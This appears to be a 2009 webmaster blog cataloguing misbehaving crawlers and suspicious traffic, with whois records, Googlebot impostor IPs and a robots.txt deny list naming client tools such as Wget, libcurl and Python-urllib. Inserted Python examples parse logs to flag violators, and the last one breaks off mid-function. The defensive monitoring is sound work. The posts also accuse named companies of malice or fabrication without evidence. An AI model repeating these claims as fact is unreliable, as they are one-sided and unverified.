RUDE.
This is probably going to cause monetary loss for our business since people keep trying to rip off these images that are totally unique to our business.
Tuesday, June 16, 2009
Comodo - unwanted traffic
There is some obvious web request manipulation going on from this network which hosts the "comodo SSL checker" bot:
inetnum: 91.209.196.0 - 91.209.196.255
netname: COMODO
descr: Comodo CA Ltd
country: GB
FollowSite Bot
FollowSite Bot ( http://www.followsite.com/bot.html ) is not obeying robots.txt on our server.
AOL Hacker
We clearly get bombed with abusive traffic repeatedly by someone on AOL. We've reported this malicious traffic to AOL a number of times and still it continues. We've finally just had to completely block the IPs in this range:
205.188.116.0-205.188.117.255
Hopefully one of these days AOL will do something about malicious traffic on their network when it is reported. They had a habit of blocking spammers which I thought was pretty cool even though we inadvertently got blocked once. We were able to contact them and fix the problem.
Now the tables are turned - AOL won't fix this problem so we have to block some traffic from their network.
The problem is not a bunch of AOL traffic. That's great. The problem is the traffic is clearly not right because it comes in excess from a multitude of IP addresses and different sessions. If it were one user looking at all the pages, the traffic should have the same IP address and session throughout the visit.
Please AOL...read your abuse@aol.com emails and fix problems like this.
Websense
After asking Websense to please stop hitting our web sites with clearly altered or bogus traffic - they proceeded to hit all our web sites repeatedly with such traffic. This is not very nice behavior. They could have emailed me back to explain what they are doing and why instead of trying to continue to bomb our web sites.
Websense does security research which I appreciate, however I do not appreciate the bogus traffic they are sending to our web sites constantly. A check once in a while would be fine but they hit the sites repeatedly every day. This seems a bit excessive.
Seriously we have a handful of local sites. Do they need to hit them three times a day??
Websense (WEBSEN-1)
Websense Network Operations Center (WNOC-ARIN) arin@websense.com +1-858-320-8000
Websense, Inc (AS13448) WEBSENSE 13448
Websense TWTC-NETBLK-4 (NET-66-194-6-0-1) 66.194.6.0 - 66.194.6.255
Websense Inc12036038 SBC06711720112828040601125225 (NET-67-117-201-128-1) 67.117.201.128 - 67.117.201.143
Bad request - Pocketinet
Our web servers just went down for some reason. Right before the problem we got a bad web request from this ip address and network ...and additionally they attempted to access the site using Wget.
64.185.119.190
Pocketinet Communications, Inc POCKETINET-1 (NET-64-185-96-0-1)
64.185.96.0 - 64.185.127.255
PocketInet POCKETINET-BG-2 (NET-64-185-119-128-1)
64.185.119.128 - 64.185.119.255
Monday, June 15, 2009
Strange traffic - related?
Getting some weird web requests right now and wondering if traffic from these IPs is somehow related:
209.112.190.24
OrgName: Alaska Communications Systems Group, Inc.
OrgID: ACSG-1
Address: c/o ACS Internet, Inc.
Address: 600 Telephone Ave.
City: Anchorage
StateProv: AK
PostalCode: 99503
Country: US
72.192.71.233
Cox Communications Inc. NETBLK-COX-ATLANTA-11 (NET-72-192-0-0-1)
72.192.0.0 - 72.223.255.255
Cox Communications NETBLK-OK-RDC-72-192-64-0 (NET-72-192-64-0-1)
72.192.64.0 - 72.192.127.255
69.50.139.225
NationalNet, Inc. NATL-MACH10-NET (NET-69-50-128-0-1)
69.50.128.0 - 69.50.143.255
WTS MACH10-WTS (NET-69-50-139-128-1)
69.50.139.128 - 69.50.139.255
170.35.224.64
OrgName: BellSouth Cellular Corp.
OrgID: BCC-12
Address: 12555 Cingular Way
Address: Suite 4360
City: Alpharetta
StateProv: GA
PostalCode: 30041
Country: US
NetRange: 170.35.0.0 - 170.35.255.255
SuperPages bot traffic
Why is the SuperPages bot
a.) not obeying robots.txt
b.) getting referred from this web site: http://www.clearwatergazette.com
c.) hitting a site that we are not running super pages ads on...
The traffic is coming from:
OrgName: Idearc Media Corp
OrgID: IMC-97
Address: 2200 W Airfield Drive
City: DFW Airport
StateProv: TX
PostalCode: 75261
Country: US
NetRange: 151.138.0.0 - 151.138.255.255
Thursday, June 11, 2009
MSR-ISRCCrawler not obeying robots.txt
Strangely, MSR-ISRCCrawler checked robots.txt. It clearly says in our robots.txt file that this bot is disallowed. Then it proceeded to crawl our site anyway. Hmm...
Cogentco - bad traffic again.
38.100.41.112
Cogentco is at it again. Actually now when you look up this IP address it doesn't say Cogentco anymore it says PSINet but same thing. They are hitting our sites with clearly garbage traffic. We've blocked them out and show a blatant error message to stay away and yet they persist.
It's pretty clear that the traffic in question is both automated and not valid as this particular IP: 38.100.41.112 has just hit all the pages in a site selling -- Christmas wreaths.
In June.
Cogentco / PSINet traffic is bad news. You may want to watch and potentially block it on your server.
OrgName: PSINet, Inc.
OrgID: PSI
Address: 1015 31st St NW
City: Washington
StateProv: DC
PostalCode: 20007
Country: US
NetRange: 38.0.0.0 - 38.255.255.255
Today's robots.txt file
If you're trying to prevent most automated traffic except major search engines on a particular web site, here's a robots.txt file. Note that not all of these are actually bots, and some things like Python, Perl and Java agents running around the Internet and used by hackers don't obey or even check robots.txt, so you'll have to use other ways to monitor and handle this traffic on your web site.
User-Agent: FollowSiteBot
Disallow: /
User-Agent: nambu
Disallow: /
User-Agent: uberbot
Disallow: /
User-Agent: KaloogaBot
Disallow: /
User-Agent: Yeti
Disallow: /
User-Agent: Servage
Disallow: /
User-Agent: ServageRobot
Disallow: /
User-Agent: Trident
Disallow: /
User-Agent: uw_cse_xwc
Disallow: /
User-Agent: ZupeeCrawler
Disallow: /
User-Agent: Webspider
Disallow: /
User-Agent: LinkAider
Disallow: /
User-Agent: Axonize-bot
Disallow: /
User-Agent: ips-agent
Disallow: /
User-Agent: RiceComputerArchitecture
Disallow: /
User-Agent: AISearchBot
Disallow: /
User-Agent: flatlandbot
Disallow: /
User-Agent: FairShare
Disallow: /
User-Agent: SapphireWebCrawler
Disallow: /
User-Agent: LocalBot
Disallow: /
User-Agent: LaBot
Disallow: /
User-Agent: Butterfly
Disallow: /
User-Agent: robotgenius
Disallow: /
User-Agent: WillyBot
Disallow: /
User-Agent: GingerCrawler
Disallow: /
User-Agent:larbin
Disallow: /
User-Agent: ru_com_viewer
Disallow: /
User-Agent:Yandex
Disallow: /
User-Agent:yandex
Disallow: /
User-Agent:msnbot-media
Disallow: /
Sitemap: http://www.rainierrhododendrons.com/sitemap.xml
User-Agent:del.icio.us
Disallow: /
User-Agent:Sika
Disallow: /
User-Agent:whois.de
Disallow: /
User-Agent:Isidorus
Disallow: /
User-Agent:Yanga
Disallow: /
User-Agent:MSR-ISRCCrawler
Disallow: /
User-Agent:Snappybot
Disallow: /
User-Agent:Gaisbot
Disallow: /
User-Agent:SapphireWebCrawler
Disallow: /
User-Agent:BobCrawl
Disallow: /
User-Agent:OpenX
Disallow: /
User-Agent:Axonize-bot
Disallow: /
User-Agent:KaloogaBot
Disallow: /
User-Agent:kalooga
Disallow: /
User-Agent:OnTownsBot
Disallow: /
User-Agent:Cazoodle-Bot
Disallow: /
User-Agent: REAP-Crawler
Disallow: /
User-Agent: DotBot
Disallow: /
User-Agent: Gigabot
Disallow: /
User-Agent: NetcraftSurveyAgent
Disallow: /
User-Agent: SurveyBot
Disallow: /
User-Agent: DBLBot
Disallow: /
User-Agent: AISearchBot
Disallow: /
User-Agent: Charlotte
Disallow: /
User-agent: IntegraTelecom
Disallow: /
User-agent: PSIBots
Disallow: /
User-agent:Websense
Disallow: /
User-agent:HornySexSearch
Disallow: /
User-agent: SnapPreviewBot
Disallow: /
User-agent: Snoopy
Disallow: /
User-agent: libwww-perl
Disallow: /
User-agent: nexen
Disallow: /
User-agent: phpversion
Disallow: /
User-agent: attributor
Disallow: /
User-agent: Java
Disallow: /
User-agent: bsalsa
Disallow: /
User-agent: whoisde.de
Disallow: /
User-agent: envolk
Disallow: /
User-agent: QEAVis
Disallow: /
User-agent: NextGenSearchBot
Disallow: /
User-agent: boitho.com
Disallow: /
User-agent: boitho
Disallow: /
User-agent: Wget
Disallow: /
User-agent: Rankivabot
Disallow: /
User-agent: T-Online Browser
Disallow: /
User-agent: webalta
Disallow: /
User-agent: page_prefetcher
Disallow: /
User-agent: cyberpatrol
Disallow: /
User-agent: sitecat
Disallow: /
User-agent: cyberpatrolcrawler
Disallow: /
User-agent: internetseer
Disallow: /
User-agent: searchme
Disallow: /
User-agent: dcbot
Disallow: /
User-agent: scoutjet
Disallow: /
User-agent: sphsearch
Disallow: /
User-agent: exabot
Disallow: /
User-agent: NaverBot
Disallow: /
User-agent: naverbot
Disallow: /
User-agent: twiceler
Disallow: /
User-agent: zermelo
Disallow: /
User-agent: Moozilla
Disallow: /
User-agent: kyluka
Disallow: /
User-agent: scoutjet
Disallow: /
User-agent: baiduspider
Disallow: /
User-agent: MLBot
Disallow: /
User-agent: worio
Disallow: /
User-agent: turnitinbot
Disallow: /
User-agent: exooba
Disallow: /
User-agent: ViolaBot
Disallow: /
User-agent: speedyspider
Disallow: /
User-agent: becomebot
Disallow: /
# disallow Googlebot-Image
User-agent: Googlebot-Image
Disallow: /
User-agent: MJ12bot
Disallow: /
User-agent: QEAVis
Disallow: /
User-agent: VWBot
Disallow: /
User-agent: ShopWiki
Disallow: /
User-agent: SnapPreviewBot
Disallow: /
User-agent: panscient.com
Disallow: /
User-agent: panscient
Disallow: /
User-agent: sproose
Disallow: /
User-agent: voyager
Disallow: /
User-agent: grub
Disallow: /
User-agent: libwww-perl
Disallow: /
User-agent: OmniExplorer_Bot
Disallow: /
User-agent: Twiceler
Disallow: /
User-agent: WebDataCentreBot
Disallow: /
User-agent: OOZBOT
Disallow: /
User-agent: setooz
Disallow: /
User-agent: bsalsa
Disallow: /
User-agent: perl
Disallow: /
User-agent: botmobi
Disallow: /
User-agent: NextGenSearchBot
Disallow: /
User-agent: ASPSimply
Disallow: /
User-agent: Python-urllib
Disallow: /
User-agent: Moozilla
Disallow: /
User-agent: voilabot
Disallow: /
User-agent: WGet
Disallow: /
User-agent: obot
Disallow: /
User-agent: Java
Disallow: /
User-agent: libcurl-agent
Disallow: /
User-agent: phpversion
Disallow: /
User-agent: therarestparser
Disallow: /
User-agent: Jakarta Commons-HttpClient
Disallow: /
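Since robots.txt is only a request, one way to monitor the agents that ignore it is to replay the access log against the file. The following is an added example, not code from this blog: it parses a robots.txt laid out like the one above, reads log lines shaped like the ones quoted in these posts (date, time, IP, path, user agent, method) and reports which disallowed clients requested pages anyway, and whether each had fetched robots.txt first. The excerpt, the log lines, the IP addresses and the case-insensitive substring matching of agent tokens are constructed assumptions.

```python
import re

# Constructed excerpt in the style of the file above: consecutive groups with
# no blank lines, a no-space "User-Agent:" line, a comment and a Sitemap line.
ROBOTS_TXT = """\
User-Agent: FollowSiteBot
Disallow: /
User-Agent:MSR-ISRCCrawler
Disallow: /
# disallow Googlebot-Image
User-agent: Googlebot-Image
Disallow: /
Sitemap: http://www.example.com/sitemap.xml
User-agent: Python-urllib
Disallow: /
"""

# Constructed log lines; the addresses are documentation ranges.
SAMPLE_LOG = """\
6/11/2009 9:00:01 AM 192.0.2.10 /robots.txt MSR-ISRCCrawler GET
6/11/2009 9:00:05 AM 192.0.2.10 /catalog/page1.html MSR-ISRCCrawler GET
6/11/2009 9:02:00 AM 198.51.100.7 /index.html FollowSiteBot (http://www.followsite.com/bot.html) GET
6/11/2009 9:03:00 AM 203.0.113.5 /robots.txt Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) GET
6/11/2009 9:03:02 AM 203.0.113.5 /index.html Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) GET
6/11/2009 9:04:00 AM 203.0.113.9 /images/a.jpg Python-urllib/2.5 GET
"""

LINE_RE = re.compile(r"^(\S+ \S+ [AP]M) (\S+) (\S+) (.+) (GET|POST|HEAD)$")


def parse_robots(text):
    """Return a list of (agent_tokens, disallow_prefixes) groups."""
    groups, agents, rules, in_rules = [], [], [], False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if in_rules:                         # a rule closed the last group
                groups.append((agents, rules))
                agents, rules, in_rules = [], [], False
            agents.append(value.lower())
        elif field == "disallow":
            in_rules = True
            if value:                            # empty Disallow allows all
                rules.append(value)
    if agents:
        groups.append((agents, rules))
    return groups


def disallowed_prefixes(groups, user_agent):
    """Disallow prefixes of the first group whose token occurs in the UA."""
    ua = user_agent.lower()
    for agents, rules in groups:
        if any(tok != "*" and tok in ua for tok in agents):
            return rules
    for agents, rules in groups:                 # fall back to the * group
        if "*" in agents:
            return rules
    return []


def find_violations(robots_text, log_lines):
    """Map (ip, user_agent) to the disallowed paths that client requested."""
    groups = parse_robots(robots_text)
    fetched_robots, findings = set(), {}
    for line in log_lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        _ts, ip, path, ua, _method = m.groups()
        client = (ip, ua)
        if path.split("?", 1)[0] == "/robots.txt":
            fetched_robots.add(client)
            continue
        if any(path.startswith(p) for p in disallowed_prefixes(groups, ua)):
            entry = findings.setdefault(
                client, {"read_robots": client in fetched_robots, "paths": []}
            )
            entry["paths"].append(path)
    return findings


if __name__ == "__main__":
    for (ip, ua), info in find_violations(ROBOTS_TXT, SAMPLE_LOG.splitlines()).items():
        how = "read robots.txt, then ignored it" if info["read_robots"] else "never fetched robots.txt"
        print(ip, "|", ua, "|", how, "|", info["paths"])
```
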
FollowSiteBot
The FollowSiteBot...
Not checking robots.txt like a good little bot...
FollowSiteBot came from this network today: 74.86.223.42
SoftLayer Technologies Inc. SOFTLAYER-4-4 (NET-74-86-0-0-1)
74.86.0.0 - 74.86.255.255
ASX Networks ApS NET-74-86-223-40 (NET-74-86-223-40-1)
74.86.223.40 - 74.86.223.47
Today's Bot Traffic - a lot of Twitter Referrals
We got hit with a lot of bots today. It seems that a great deal of this may be caused by Twitter posts.
14 174.129.124.97 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
13 67.202.8.12 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
12 75.101.139.240 Python-urllib/1.17 GET 6 2009 10
11 174.129.123.212 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
8 216.24.131.119 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Me.dium/1.0 (http://me.dium.com) GET 6 2009 10
8 216.24.131.119 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Me.dium/1.0 (http://me.dium.com) HEAD 6 2009 10
6 64.73.66.94 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618) GET 6 2009 10
6 195.210.57.83 Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler) GET 6 2009 10
6 130.76.32.16 Mozilla/4.0 (compatible;) GET 6 2009 10
5 216.100.200.126 Mozilla/4.0 (compatible;) GET 6 2009 10
3 130.76.32.181 Mozilla/4.0 (compatible;) GET 6 2009 10
3 174.129.168.229 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
2 174.129.118.37 Python-urllib/2.5 GET 6 2009 10
2 208.74.66.43 libwww-perl/5.825 GET 6 2009 10
2 174.129.89.199 Python-urllib/2.5 GET 6 2009 10
2 67.220.192.206 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729) GET 6 2009 10
2 67.112.74.47 Mozilla/4.0 (compatible;) GET 6 2009 10
1 67.202.58.81 rdfbot/1.0 (rdfbotsupport AT rediffmailpro DOT com) GET 6 2009 10
1 69.58.178.33 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7 GET 6 2009 10
1 67.23.27.247 Nambu URL Destination Determinator +bot http://nambu.com GET 6 2009 10
1 67.23.27.250 Nambu URL Destination Determinator +bot http://nambu.com GET 6 2009 10
1 75.101.178.247 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
1 174.129.224.58 PycURL/7.19.0 GET 6 2009 10
1 174.129.104.29 Python-urllib/2.5 GET 6 2009 10
1 174.129.223.229 uberbot 1.0 HEAD 6 2009 10
Wednesday, June 10, 2009
Twitturly - bad bot on Amazon network
Whatever Twitturly is, it is not obeying robots.txt. It came from the Amazon network at this IP address: 174.129.88.144
Additionally it came in conjunction with a number of other bots that hit this particular site at the same time. I assume it was because the web site owner posted her site somewhere that is being monitored by bots. Unfortunately the bots seem to be misbehaving.
LocalBot not checking Robots.txt
Something coming from this IP: 121.138.194.106 called LocalBot is not checking robots.txt files. Annoying.
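One way to confirm from the access log that a bot such as FollowSiteBot, Twitturly or LocalBot is ignoring robots.txt (an added example, not code from this blog). The robots.txt excerpt follows the style of the file posted here; the log rows, their RFC 5737 documentation IP addresses, and the function names are constructed for the demo.

```python
"""Flag clients that a robots.txt record fully blocks but that request pages anyway."""

# Excerpt in the style of this blog's robots.txt (records run together, no blank lines).
ROBOTS_TXT = """\
User-Agent: LocalBot
Disallow: /
User-agent: Python-urllib
Disallow: /
User-Agent:KaloogaBot
Disallow: /
User-agent: *
Disallow: /private/
"""

# Constructed sample log rows: (client IP, user agent, requested path).
SAMPLE_LOG = [
    ("192.0.2.10", "LocalBot/1.0", "/"),
    ("192.0.2.10", "LocalBot/1.0", "/products.html"),
    ("198.51.100.7", "Python-urllib/2.5", "/robots.txt"),
    ("198.51.100.7", "Python-urllib/2.5", "/index.html"),
    ("203.0.113.5",
     "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)",
     "/robots.txt"),
    ("203.0.113.9", "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/2.0", "/index.html"),
]


def parse_fully_blocked_agents(robots_txt):
    """Return lower-cased User-agent tokens whose record contains 'Disallow: /'.

    Assumption: records carry no Allow overrides, as in the file on this page.
    """
    blocked = set()
    agents = []        # User-agent tokens of the record being read
    seen_rule = False  # True once the current record has a rule line
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()
        if ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if seen_rule:  # a User-agent line after a rule starts a new record
                agents, seen_rule = [], False
            agents.append(value.lower())
        elif field in ("disallow", "allow"):
            seen_rule = True
            if field == "disallow" and value == "/":
                blocked.update(a for a in agents if a != "*")
    return blocked


def match_blocked_token(user_agent, blocked):
    """Return the longest blocked token contained in the user agent, or None.

    Substring matching catches tokens buried inside a 'Mozilla/5.0 (compatible; ...)'
    string; very short tokens can over-match, so review hits before blocking on them.
    """
    ua = user_agent.lower()
    hits = [token for token in blocked if token in ua]
    return max(hits, key=len) if hits else None


def find_violators(log_rows, robots_txt):
    """Map (ip, token) -> stats for blocked agents that requested anything but robots.txt."""
    blocked = parse_fully_blocked_agents(robots_txt)
    stats = {}
    for ip, user_agent, path in log_rows:
        token = match_blocked_token(user_agent, blocked)
        if token is None:
            continue
        entry = stats.setdefault((ip, token),
                                 {"fetched_robots": False, "disallowed_hits": 0})
        if path.split("?", 1)[0] == "/robots.txt":
            entry["fetched_robots"] = True
        else:
            entry["disallowed_hits"] += 1
    return {key: value for key, value in stats.items() if value["disallowed_hits"] > 0}


if __name__ == "__main__":
    for (ip, token), info in sorted(find_violators(SAMPLE_LOG, ROBOTS_TXT).items()):
        note = "read robots.txt, ignored it" if info["fetched_robots"] else "never read robots.txt"
        print(f"{ip} {token}: {info['disallowed_hits']} disallowed hits ({note})")
```

A client that read robots.txt and still crawled is knowingly ignoring the file; either way robots.txt is advisory, so enforcement has to happen at the server or firewall.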
Tons of hits from 204.16.231.98 - Sparkplug, Inc.
Not sure why but our web sites are getting what seems to be an excessive number of hits from the Sparkplug, Inc. network in Chicago.
The particular IP address doing the traffic generation is: 204.16.231.98
OrgName: Sparkplug, Inc.
OrgID: SPARK-3
Address: 303 W. Erie
Address: Suite 300
City: Chicago
StateProv: IL
PostalCode: 60610
Country: US
NetRange: 204.16.228.0 - 204.16.231.255
The traffic hitting our server seems to be focused on a particular web site that serves local customers for the particular business - who are not in Chicago.
Maybe this is just someone admiring the work on our web sites, I am not sure...seems a little odd however.
Tuesday, June 09, 2009
VeriSign - unwanted traffic
Why is Verisign hitting our sites repeatedly with unwanted traffic?
This IP address: 69.58.178.33 was hitting our site repeatedly from 6/8/2009 8:19:33 PM to 6/8/2009 8:19:57 PM.
So what? The site is advertising the sale of Christmas wreaths and this is JUNE. It's the middle of the summer and obviously no one at Verisign is interested in buying Christmas wreaths.
The IP or computer/server at Verisign scanned this site and hit 25 different pages. Obviously this is not someone reviewing the site to buy something and obviously there is some automated software on this server at Verisign doing something on our servers - who knows for what or why. It definitely was not for any service requested by us.
Here's the Verisign network in question:
OrgName: VeriSign Infrastructure & Operations
OrgID: VIO-2
Address: 21345 Ridgetop Circle
City: Dulles
StateProv: VA
PostalCode: 20166
Country: US
NetRange: 69.58.176.0 - 69.58.191.255
Norton - Update Not Working?
I set up Norton Anti-Virus on a new machine recently and when I did, I noticed that it looked different than the version of Norton running on my other machine. I installed Norton on this other machine probably close to a year ago but I have updated it regularly since then.
So is the problem that Norton Antivirus is not actually updating, or that if you have an old version they just leave parts of it intact so it doesn't look completely like the new version?
With this and my last post about Adobe Acrobat - seems like you may want to frequently uninstall and reinstall certain software that may have been affected by malware or viruses.
Perhaps vendors also need a better way to verify their update process is working.
Adobe Acrobat Reader - Update Not Working?
I typically update all my software fairly regularly. I noticed a while ago that I have an old version of Adobe Acrobat Reader even after doing the updates many times. I finally decided to uninstall Adobe Acrobat Reader 8.something so I could install the latest version.
I was reminded that I need to do this when I went to the Secunia web site and saw the latest Adobe Acrobat Reader advisory - which unfortunately includes version 9:
Adobe Acrobat Reader - Memory Corruption Vulnerability
This particular vulnerability above is only confirmed for Linux but chances are it occurs on other operating systems as well.
Additionally, someone I know was recently using Adobe and some rogue JavaScript code caused him some problems on one of his machines - which is how I got into looking at the whole Adobe Acrobat Reader update problem in the first place.
Interestingly enough, after uninstalling Adobe Acrobat Reader version 8, I tried to go to the Adobe web site and when I clicked the link to install the most recent version of Adobe I got an error saying my IP was blocked. Ok, so I'll just jump on a different network. That IP was blocked too. Ok, that's odd. I went to a completely different machine and was able to click the download link. So I came back to document all of this in my blog - and suddenly now I can download again.
One thing I don't like about Adobe's web site is that the download is in HTTP, not HTTPS. How do we know files and bits and bytes aren't getting altered in transit?
Monday, June 08, 2009
Rundll.exe and task manager
When I pulled up task manager, a process - I think using rundll.exe - was running and disappeared shortly after opening the task manager. I have noticed a lot of times when I open the task manager whatever was hung up on my computer suddenly starts working. This leads me to wonder if some malware is designed to automatically shut off if the task manager is opened, as users are getting hip to the fact that extraneous processes running could mean trouble...
Would be nice to have a button in task manager to easily get to some log of what was recently running on your computer as well as what is currently running.
Thursday, June 04, 2009
Malware - DigExt?
Had a user cross our site today that hit our site with numerous bad URLs obviously looking for some type of hack.
Time/Date: 6/4/2009 9:04:23 PM
The user agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)
IP Address: 204.16.231.98
They came from this network:
OrgName: Sparkplug, Inc.
OrgID: SPARK-3
Address: 303 W. Erie
Address: Suite 300
City: Chicago
StateProv: IL
PostalCode: 60610
Country: US
ReferralServer: rwhois://rwhois.sparkplugbb.net:4321/
NetRange: 204.16.228.0 - 204.16.231.255
Hotstocked.com - RateItAll
Had problems with web sites posting incorrect or harmful information about you and having a problem getting it removed?
You can post your comments about these web sites at RateItAll.com
For instance someone I know is having problems getting their name removed from HotStocked.com which has posted a lot of incorrect information about people and refuses to remove it upon request.
Add your comments about HotStocked.com:
http://www.rateitall.com/i-995297-hotstockedcom.aspx
For an example of the type of posts you'll find on Hotstocked.com which are derogatory and probably personal attacks and altercations rather than useful information, search the site for negative postings about people and requests for removal that have not been granted. I'm sure you'll quickly find that Hotstocked.com is full of spammy, personal content and most likely fabricated information about people posted by those who dislike them for whatever reason.
Wednesday, June 03, 2009
Moozilla
We get repeated hits from a user agent called Moozilla. The hits will come from a bunch of different IP addresses on the Netscape/AOL network in succession. Sample hits:
6/1/2009 17:46 207.200.116.73 Moozilla
6/1/2009 17:46 207.200.116.131 Moozilla
6/1/2009 17:46 207.200.116.135 Moozilla
6/1/2009 17:46 207.200.116.136 Moozilla
6/1/2009 17:46 207.200.116.5 Moozilla
6/1/2009 17:46 207.200.116.12 Moozilla
6/1/2009 17:46 207.200.116.135 Moozilla
6/1/2009 17:46 207.200.116.136 Moozilla
6/1/2009 17:46 207.200.116.5 Moozilla
6/1/2009 17:46 207.200.116.12 Moozilla
6/1/2009 17:46 207.200.116.67 Moozilla
6/1/2009 17:46 207.200.116.6 Moozilla
6/1/2009 17:46 207.200.116.65 Moozilla
We have sent specific messaging back to this bot or software and contacted AOL about the problem but the particular traffic continues. When this particular software hits, it generates hundreds of hits on our web site in succession and does not behave like a normal web user.
The network reported generating this traffic is Netscape (now owned by AOL).
OrgName: Netscape Communications Corp.
OrgID: NSCP
Address: 501 E. Middlefield
City: Mountain View
StateProv: CA
PostalCode: 94043
Country: US
NetRange: 207.200.64.0 - 207.200.127.255
SurveyBot - Compass Communications
The SurveyBot from Whois.sc hosted at Compass Communications, apparently located at the Westin Building in Seattle, is not obeying our robots.txt files.
OrgName: Compass Communications, Inc.
OrgID: CPCM
Address: 2001 6th Avenue
Address: Suite 3205
City: Seattle
StateProv: WA
PostalCode: 98121
Country: US
NetRange: 216.145.0.0 - 216.145.31.255
Some others have been asking about this particular bot on forums:
Compass Communications
I do not particularly appreciate the fact that they scrape web content during their visits.
Tuesday, June 02, 2009
Another Google Bot Impostor
Just got hit by another Google bot impostor:
216.240.151.50
6/2/2009 4:20:59 PM
Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
OrgName: ATMLINK, INC.
OrgID: ATMLIN
Address: 600 W. 7th Street
Address: Suite 360
City: Los Angeles
StateProv: CA
PostalCode: 90017
Country: US
NetRange: 216.240.128.0 - 216.240.159.255
AT&T Wireless Doesn't Report Accurate Location
Interesting - using an AT&T Wireless card in Seattle reports an IP address that makes it look like I'm in Florida.
OrgName: AT&T Global Network Services, LLC
OrgID: ATGS
Address: 3200 Lake Emma Road
City: Lake Mary
StateProv: FL
PostalCode: 32746
Country: US
NetRange: 32.0.0.0 - 32.255.255.255
Sunday, May 31, 2009
More Google Imposters
It appears (unless Google has Google bots in the cloud and on various little networks all over the place, which I doubt after looking up these particular IP address networks) that there are some Googlebot impersonators out there. It would seem that this is really an impersonator because not only are these requests not coming from Google networks, they seem to only be interested in a few sites, not all the sites on our server. They are particularly interested in travel and real estate web sites. Check your logs... if the IP addresses for Googlebots are not coming from Google networks, you probably want to block them from viewing your web sites. They can only be up to no good.
Here are the Google impostor IP addresses:
2 2009 5 12.20.32.67 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 5 151.84.166.1 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
8 2009 5 209.7.26.158 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
25 2009 5 216.177.164.100 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 5 216.240.151.50 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
152 2009 4 24.44.206.249 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 5 65.213.90.26 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
87 2009 4 68.238.131.215 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 4 69.116.160.44 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 5 69.116.160.44 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 5 69.70.64.94 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 5 70.101.224.174 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 5 71.116.210.34 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
79 2009 4 71.43.155.145 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
2 2009 4 74.169.43.199 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 4 74.243.24.159 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
57 2009 4 74.243.25.64 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
10 2009 5 75.146.149.53 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 5 76.249.223.78 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
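The log check suggested above, as an added example (not code from this blog). Instead of the manual whois lookups used in these posts, it applies the reverse-then-forward DNS confirmation that Google documents for verifying Googlebot; the DNS tables, the RFC 5737 documentation IP addresses and the function names are constructed for the demo.

```python
"""Verify clients that claim to be Googlebot: PTR lookup, then forward confirmation."""
import socket

GOOGLE_SUFFIXES = (".googlebot.com", ".google.com")
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


def system_reverse(ip):
    """PTR lookup through the system resolver; None when there is no record."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return None


def system_forward(host):
    """Forward (A record) lookup through the system resolver; empty set on failure."""
    try:
        return set(socket.gethostbyname_ex(host)[2])
    except OSError:
        return set()


def verify_googlebot_ip(ip, reverse=system_reverse, forward=system_forward):
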